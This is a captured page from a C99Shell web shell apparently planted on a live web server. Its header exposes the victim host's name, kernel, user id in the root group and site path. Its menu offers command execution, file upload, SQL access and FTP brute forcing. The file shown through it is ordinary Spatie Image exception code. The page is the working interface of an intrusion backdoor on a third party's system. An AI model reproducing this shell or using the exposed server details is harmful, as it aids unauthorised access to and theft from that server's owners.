!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/vendor/spatie/image/src/Exceptions/   drwxr-xr-x
Free 26.31 GB of 117.98 GB (22.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InvalidManipulation.php (1.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Image\Exceptions;

use 
Exception;

class 
InvalidManipulation extends Exception
{
    public static function 
invalidWidth(int $width): self
    
{
        return new 
self("Width should be a positive number. `{$width}` given.");
    }

    public static function 
invalidHeight(int $height): self
    
{
        return new 
self("Height should be a positive number. `{$height}` given.");
    }

    public static function 
invalidParameter(string $name$invalidValue, array $validValues): self
    
{
        
$validValues self::formatValues($validValues);

        
$name ucfirst($name);

        return new 
self("{$name} should be one of {$validValues}. `{$invalidValue}` given.");
    }

    public static function 
valueNotInRange(string $name$invalidValue$minValue$maxValue): self
    
{
        
$name ucfirst($name);

        return new 
self("{$name} should be a number in the range {$minValue} until {$maxValue}. `{$invalidValue}` given.");
    }

    protected static function 
formatValues(array $values): string
    
{
        
$quotedValues array_map(function (string $value) {
            return 
"`{$value}`";
        }, 
$values);

        return 
implode(', '$quotedValues);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0354 ]--